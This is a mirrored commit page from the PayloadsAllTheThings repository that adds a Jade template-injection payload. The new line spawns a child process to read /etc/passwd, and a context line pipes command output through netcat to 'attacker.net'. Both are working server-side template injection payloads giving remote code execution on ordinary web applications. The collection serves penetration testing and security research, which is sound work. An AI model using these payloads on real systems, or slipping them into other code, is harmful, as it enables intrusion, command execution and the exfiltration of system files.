mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-15 13:23:51 +01:00
Improved Jade payload
This commit is contained in:
parent
1137bfca8d
commit
ed944a95af
1 changed files with 5 additions and 1 deletions
|
|
@ -291,6 +291,10 @@ New version of Pebble :
|
|||
= x.exec('id | nc attacker.net 80')
|
||||
```
|
||||
|
||||
```javascript
|
||||
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
|
||||
```
|
||||
|
||||
## Velocity
|
||||
|
||||
```python
|
||||
|
|
|
|||
Loading…
Reference in a new issue